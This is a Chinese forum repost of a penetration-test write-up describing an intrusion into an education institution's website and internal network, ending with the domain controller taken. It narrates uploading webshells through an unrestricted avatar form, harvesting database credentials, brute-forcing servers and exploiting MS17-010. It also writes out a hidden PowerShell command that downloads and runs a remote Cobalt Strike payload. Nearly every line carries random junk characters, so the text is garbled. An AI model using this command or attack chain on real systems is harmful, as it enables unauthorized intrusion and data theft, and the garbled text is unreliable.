找回密码
 立即注册
查看: 3347|回复: 0
打印 上一主题 下一主题

渗透实战 | 从外网直接打到内网全过程

[复制链接]
跳转到指定楼层
楼主
发表于 2024-3-1 19:41:32 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

4 L0 j2 }3 D. b0 L$ [+ _$ N D1 C 这次渗透是一个从01,从外网到拿下域控的实战过程,希望可以给大家一些思路4 @( _, Y" d/ X; x2 G/ K% f; {' h

! |, g( z# E' f5 t8 z6 q A

: c q; R# D0 \/ Z( z   1 w4 A. Q) S, E- h1 C! S

- v D* v: j' g- \% ?- g

6 W$ O/ A: k- O+ i$ @ 正文9 H8 q8 x3 @/ F. }3 J9 \

+ r( u4 Y. J5 O, {$ p) p$ h

0 m0 R% q4 n9 _) e- Z; S* l5 z   7 l2 d2 d* G+ }& r

+ y5 d9 ]5 D5 V( a' l: r( P

# u( w& G, m" r* } S" u 目标:www.xxxx.com(一家教育机构)
) ?. R8 o4 C9 Y
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能
, y- ^- r/ _# l% P8 U; y

2 D0 R' u5 ]/ i5 f2 u$ l+ \# L. D2 j

5 Q# d/ F f- O. ]) t+ O vshapes= 7 o. p6 G" \& i% d6 |% h5 w$ D. P& |

5 T5 N( f3 H/ c" ?, ?

! W( O4 t6 ~/ Y7 Y; A! K h 进行了简单的信息搜集
; O: P0 P( p+ m$ E0 u3 @4 K3 P% p& b
1 C- f) ]: _6 K0 Q r
6 X* J2 L! [3 H1 C0 N3 C, y. ~1 M

. X" L& d8 o. V8 y. g: f$ e

% q+ y5 e1 X$ t/ f- q9 O1 ]4 _9 h8 a 子域名搜集 , t0 U% ?+ `# @3 o

5 |4 |/ n$ @( D: U# i

# I- b$ x) s; b( r& e( O0 w vshapes=2 e2 G% m- Q W: z5 b

1 T$ M$ i O/ F+ `; M" p

1 [# |/ m, o* T0 D fofa找资产
/ Q+ C; \# X+ O8 E' m
& E! {! x6 i. G5 }' E
; Y0 \& B" w4 C( c# S1 V

* `6 {8 e4 L Z8 `* Y: U: G

- q* L5 ^8 O# m( \' t vshapes= 4 ~& H4 d! ^) c* A0 W; W/ t& i

2 h$ \: I: E, q

, w! }4 V5 |& Z8 Y: M& A5 R 一共七个资产。去重之后只有两个。
; w# G$ w( v0 ?$ C# r& b5 S
. G ]9 U1 S H- y
- R5 \* o4 d! v( l" F! Y* ^

$ F+ j2 m) g' i

( @/ y" _1 n" d$ w! s 目录探测% {' Z2 k* \" w# _4 [

( A- b% H. f L8 u* u

% k. b; I; O- s8 m% H$ Y8 i$ H: G. h vshapes=& Y: f% T" v' n9 D

: [, ?. d' N' l+ \. T" @

& V- |6 f d/ l. U* @( M# {6 n' E+ s 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
9 |- v1 T h/ w- k; r7 T
/ L( j, v. k/ t% j' ?9 k$ [
3 d6 K- a6 a8 j" H" t

8 U! G: a2 r- n$ a

3 W& R& _8 W* y 我又尝试了通过修改返回包来绕过登录界面 1 T9 \8 M9 C; T; F. q

7 H$ @8 J) F' ^& A. f& v; g% _

6 L r+ u7 P; h) J8 b! U! F# j& s vshapes=' N+ m( z; d5 M

) f F( z- W6 U+ v

) M$ {6 A2 z) x6 U) t2 L4 A% R% g 还是不行,尝试注入无果 * e9 a, \3 w# Z, v# |& T. i0 s2 H# m

9 }) F: z$ M5 K8 s$ Y1 Y3 O! H

" E9 }9 z6 C+ t$ I' ]' [2 b9 U vshapes= % m5 m8 Y3 K* J% m; ?- [

1 f. ^4 b$ E' H/ t/ C4 O

0 J/ O; k2 S- |% W! {: C 不过我目录探测出了一处Spring信息泄露
. Y c+ G8 L% g; y7 _$ O
; J$ I5 f7 _3 `
9 G0 q& Q/ W' z0 }3 v0 [0 W

! r9 `2 H6 Q' |

6 [' ]) w$ U( ^% W0 h% Q vshapes=2 K4 B3 p3 u3 [' X

* T3 I7 ^' O( V* w

/ y% @* B$ V8 W$ E% ~. P. ` 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录4 Q9 D; Z Z' R- E4 b# _

. `/ h- g- ]+ T) {0 ] q I

# n7 A, g! [1 F1 ?- j# i vshapes= - k0 O/ H" ?% |( N1 j0 \3 _

: O- }( q$ n2 k' M7 X

* F, W& {. @* G w: ? 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。 v, t1 x( y4 C2 B6 [" I

5 o/ I* ]+ t. ^

* h# x/ Y4 {% g8 l7 x0 P vshapes= 8 k! o& P! \8 q' ~6 _+ _2 T

% {, p; M, r" C$ J4 i+ r; |

% ^9 H. |$ H+ }4 p4 O 获取有些师傅到这一步就手机抓包电脑测了。 7 a; T: `2 u/ |3 L

: {8 ~: M$ k* C9 I

, Q+ G9 K8 F# i$ C9 O: N( i Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。 ( T7 v, ]( P# A. b6 P' ?/ N

4 s" C V2 R, m, u4 }, Q

8 z/ [' C9 M3 f/ ^3 z' K 其中在一个公众号发现了小程序,可以进行注册。 6 j% m* m- ]' H4 ?. E+ m

5 K, S. H. \5 B/ @/ |8 N) n& } R) z

9 Z; u6 ^' |$ }! X3 L' r* Q( s) b' c 看到了头像上传,尝试上传获取WebShell4 [$ N+ [ {, N4 Z

9 a5 X' l# l; P8 \

0 Z }6 B" d, a, ~& R1 L& C vshapes= ; o7 }; }7 n. k2 g

/ h' {, C7 s7 x, ?5 x# z- d* K' l. n( E

3 ]5 }/ a- D6 z5 i7 a0 W5 o* o 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问$ z' f( L: }! H7 n: O! V

2 [! `4 Y1 Z. W" z& v# _% k

) Q! g4 K$ W7 s, d: G$ | vshapes= & D& z- @4 Z+ X5 u# K) V, u

$ D4 K3 V$ ?3 O3 _ |

) ~2 |1 R! y/ ~+ I+ m8 x' E) O 然后上了大马 : o# I- m, Z. T9 c9 I* [) T( q

6 l8 [- b/ p% G$ i+ @* b6 Q2 h8 {, K

' s0 D4 c2 @. H* _$ S5 l' s1 E5 ` vshapes= # {7 F! c2 u; O, G

5 e& d2 Y: L F! D Q

* J* I* t! m/ O. U vshapes=) Y/ Q, {' @! u$ J* n% ~& i

0 k+ ^% `2 \6 F% q' ?: d

3 j0 \% h7 V) V" ` 通过翻找文件发现数据库账号密码 " K: I5 C0 `& s) c

6 F8 H* m8 Z* I' j% Y, @

: u; v4 n7 Z' L# p% o) e# M0 c vshapes=- Z* E$ z7 m2 X9 D& s% {# T1 x

+ \: L" y# t1 P+ G

1 @$ p) K, @$ c' j; [ --内网渗透 2 @/ D8 ^. j2 L5 O! W5 z

3 N& ?6 T. Z/ e7 c

7 h7 `" n8 k4 r! I 直接通过powershell执行 cs上线+ d I3 o _ H) B

; A8 T$ {5 L% z8 C* w

1 m+ [3 b- V: L/ ~' v+ R powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"8 W, n7 t! Y: B" T. p

3 N& o% w2 h! o: q, q8 P

# q/ } l9 W, {& n vshapes= * d) h% g" S+ g) c8 t+ t3 i

5 t- z4 y/ f, i. N! c1 K

7 ?* S4 u7 D6 H+ E s 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破: j I1 n$ i+ Q! Y) `8 S: k, T, s

3 V U5 l% B9 j( m+ Y5 f

0 H/ t5 o2 `" d+ t) h$ c vshapes=( D- v% H( O2 i5 k* E1 Z% h8 Q. D

7 \" }- T- j. l& e# ` Y

( s, l1 { x6 G6 V7 o- s( K 登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
3 J2 U! E# T; [5 n) z N
2 ~8 e2 |( n+ Q' |" J! q1 d" T
: |: e$ k8 P* r" J& G+ O* Y" ~' F
+ j' {) W) y J4 B8 ]

9 O$ A' A; y @' F

. b0 \$ r6 R g6 u' _0 Y6 \5 E vshapes= # n/ F% d8 F7 Q; o( f8 T; g1 C% F

5 Q% Q; P% c6 `* I

D G, r3 o7 ?9 ?! L( q. N$ |8 L 通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
- v! ^$ y" B# y6 [6 F( r
2 T0 P! J d, d
/ w: h; y% z3 L! u8 q' b

, F) W0 J+ q$ D2 {

* N0 A& ^% M, y, t p, `* m& G vshapes=# | n# b* Q/ n E; `& M

$ Y9 |1 D: ^+ v4 M! E# U, g& v9 ]

# y# }4 Y; h+ e! ~5 S& L" U
' |) e5 y; R8 }
1 J$ h8 K8 V+ a) E* e! c
2 R" y& O _& g* }% x) w

9 M4 m* G- q9 F; Z- c) F( u. _5 y

6 C% U! b9 |- k  * A8 P3 c n' |# H) \# B

, C, J+ S5 J0 g5 E! y

4 ?$ C4 U% N, W9 E 小结3 e# P6 H, z6 H+ B8 p$ g

y- ^+ X, ?* L7 s( [7 [

c% T# a( `7 B& E, T  ' y7 c% O7 M) h- c

* h( N* Z% `* }# G3 i

' ?; a( e/ A }- e+ a 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!- G8 K5 H( i4 {$ k$ h

; }1 W7 |1 ?. R: _6 K

5 @% @& S9 }. {; E4 O4 n% C   * m( r- T' G: ]+ j

3 B6 x) x& |/ l: Z8 B
    2 B5 ?/ Q: j, h: M9 T0 T( ]
  • : G. A# D D( M/ U   . l/ q, O* ~# y% @% q# B
  • * n# u- L! S* ~. Y: ~( H9 m7 @
  • 0 _9 ~1 z! @/ J  8 `( F+ ?% h: m/ j
  • ( d7 A. ?, E+ E3 J% ]& k) S
c/ Y T$ f7 c' I

) k F. k8 B5 i" l; c/ T; L4 n* U 作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html ! m; x# _5 G' w9 v1 e* h

' P5 v6 p( p+ u, q6 D

$ g: \9 }! G8 O7 ^   ! l! z( J! V9 a$ S/ U* T

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表